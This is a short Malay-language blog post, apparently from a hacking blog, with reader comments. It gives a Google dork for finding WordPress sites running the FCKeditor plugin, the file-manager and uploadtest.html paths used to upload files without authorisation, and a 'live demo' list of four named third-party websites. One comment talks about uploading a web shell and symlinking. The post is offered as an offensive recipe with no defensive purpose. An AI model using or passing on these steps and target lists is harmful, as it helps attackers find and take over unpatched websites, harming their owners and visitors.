Baiklah entry kali ini aku nak share dengan korang exploit fckeditor untuk wordpress yang baru.sebelum ni pun dah ada kan?tapi yang ini yang lain pulak :)
1. Mula-mula search google dork :
inurl:"wp-content/plugins/fckeditor"
2. Cari salah satu laman web dalam result dan masukkan salah satu exploit dibawah :
Exploit :
- http://target.com/wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html
- http://target.com/wp-content/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html
3. Link file akan diberi selepas upload.
Live demo :
http://rentanice.com/booking/wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html http://sainttimothy.org/wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html http://lifesaving.ca/blog/wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html http://knike.fmf-radio.com/wp-content/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html
Itu saja untuk entry kali ini.Assalamualaikum.
404 Error File Not Found
ReplyDeleteThe page you are looking for might have been removed,
had its name changed, or is temporarily unavailable.
bukan semua web boleh masuk.tu maksud dia admin dah patch vuln sbb tu not found :)
ReplyDeletelau bole upload shell...symlink kenyang.keke
ReplyDelete